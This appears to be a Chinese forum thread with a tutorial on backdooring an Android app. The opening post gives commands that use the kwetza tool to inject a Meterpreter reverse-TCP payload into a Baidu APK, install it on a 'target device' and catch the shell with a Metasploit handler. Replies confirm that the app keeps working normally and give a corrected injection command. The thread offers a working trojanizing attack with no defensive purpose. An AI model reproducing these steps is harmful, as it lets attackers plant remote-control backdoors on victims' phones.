找回密码
 注册

QQ登录

只需一步,快速开始

git clone https://github.com/sensepost/kwetza
cd kwetza
python kwetza.py baidu.apk 监听者IP 监听端口 yes

#这里选取了百度的apk文件做测试
随便输入一个密码
得到新生成的apk文件
将注入完成的apk文件安装在目标设备
也可以本机
xdg-open baidu.apk
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 监听者IP
set lport 监听端口
exploit

最佳答案

本帖最后由 qwe 于 2019-7-23 20:53 编辑 必须要加https/tcp 后面加AssistActivity才可以

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
分享至 : QQ空间
收藏

7 个回复

倒序浏览
感谢分享!学习了!
回复 使用道具 举报
这个给APP安装了后门后,影响原APP的正常运行吗?
回复 使用道具 举报
admin 2019-6-25 14:56:07
4#
Richard 发表于 2019-6-25 04:31
这个给APP安装了后门后,影响原APP的正常运行吗?

不影响!
回复 使用道具 举报
qwe 新手上路 2019-7-21 15:33:36
5#
本帖最后由 qwe 于 2019-7-21 15:37 编辑

是版本的原因吗,我只能这样执行
  1. python kwetza.py PokemonDuel.apk tcp 192.168.10.6 4444 yes AssistActivity
复制代码


回复 使用道具 举报
admin 2019-7-21 16:20:58
6#
qwe 发表于 2019-7-21 07:33
是版本的原因吗,我只能这样执行

发个图片我看看!
回复 使用道具 举报
qwe 新手上路 2019-7-23 20:42:44
7#
本帖最后由 qwe 于 2019-7-23 20:53 编辑

必须要加https/tcp 后面加AssistActivity才可以

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
回复 使用道具 举报
admin 2019-7-24 15:39:39
8#
qwe 发表于 2019-7-23 12:42
必须要加https/tcp 后面加AssistActivity才可以

嗯嗯!
回复 使用道具 举报
您需要登录后才可以回帖 登录 | 注册